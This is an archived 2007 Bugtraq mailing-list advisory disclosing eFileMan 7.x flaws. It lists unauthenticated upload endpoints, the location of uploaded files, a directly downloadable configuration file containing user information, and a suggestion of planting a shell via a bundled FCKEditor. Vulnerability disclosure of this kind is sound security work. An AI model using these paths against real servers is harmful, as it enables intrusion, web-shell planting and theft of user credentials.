lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20071023172633.7837.qmail@securityfocus.com>
Date: 23 Oct 2007 17:26:33 -0000
From: pete.houston.17187@...il.com
To: bugtraq@...urityfocus.com
Subject: [Vulz] eFileMan 7.x Multiple Vulnerabilities by Xcross87

Software : eFileman
Version : 7.x (tested on 7.1.0.87-88)
Found by : Xcross87

A. Remote File Upload Vulnerability :

Xploit :

http://victim.com/[path]/upload.html
http://victim.com/[path]/cgi-bin/efileman/upload.cgi

The uploaded files are stored in :
http://victim.com/[path]/uploads/upload_file.xxx

B. Direct Access or Download Configuration File
Xploit :
http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information

C. FCKEditor Inclusion.
For full pack of eFileman installation including FCKEditor, attacker can up shell through upload vulnerability of FCK

=== Xcross87 | HCETeam Xploiter ===

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ